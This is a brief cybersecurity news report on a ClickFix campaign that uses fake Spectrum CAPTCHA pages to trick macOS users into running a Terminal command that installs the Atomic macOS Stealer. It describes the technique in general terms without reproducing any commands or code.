Cybersecurity experts have uncovered a fresh malware campaign targeting macOS users through a social engineering technique known as ClickFix. This operation aims to deceive users into downloading a malicious software called Atomic macOS Stealer (AMOS), designed to steal sensitive information from Apple devices.
Researchers at CloudSEK report that the attackers exploit lookalike domains mimicking the U.S. telecom company Spectrum. These fake sites prompt visitors to complete a CAPTCHA to “verify security,” but when users attempt the check, they encounter a failure message pushing them toward an “Alternative Verification” process.
Accepting this alternative causes a command to be copied to the user’s clipboard, along with instructions to run certain commands based on their operating system. While Windows users are directed to execute a PowerShell command, macOS users are instructed to run a shell script via the Terminal app.
This shell script asks users for their system password and proceeds to download the Atomic Stealer malware, which uses native macOS commands to harvest credentials, bypass defenses, and install malicious files.
Security analyst Koushik Pal points out that the attackers made several errors in their setup, such as mixing instructions for Windows and macOS users, suggesting a rushed deployment.
The campaign appears linked to Russian-speaking cybercriminals, as indicated by Russian comments found in the malware code.
This ClickFix tactic, which manipulates users into running harmful commands disguised as routine verifications, has been increasingly observed in recent months. Attackers leverage this method to deliver a wide array of malware, including trojans, stealers, and ransomware.
The threat actors commonly use fake CAPTCHA pages that look identical to legitimate services such as Google reCAPTCHA or Cloudflare Turnstile. These pages sometimes appear on compromised websites, making them harder to detect.
Experts warn that users’ habitual quick-clicking on verification prompts, known as “verification fatigue,” is exploited by these campaigns to gain unauthorized access and steal data.
Similar campaigns have targeted organizations via email phishing, with malicious links leading victims to fake CAPTCHA pages that install remote access tools or information stealers.
Security firms have detected numerous ClickFix-based attacks across multiple regions, including Europe, the Middle East, Africa, and the United States, noting that the technique is flexible and increasingly popular among cybercriminals.
Stay informed. Stay secure.
—Cybersecurity88 Editorial Team
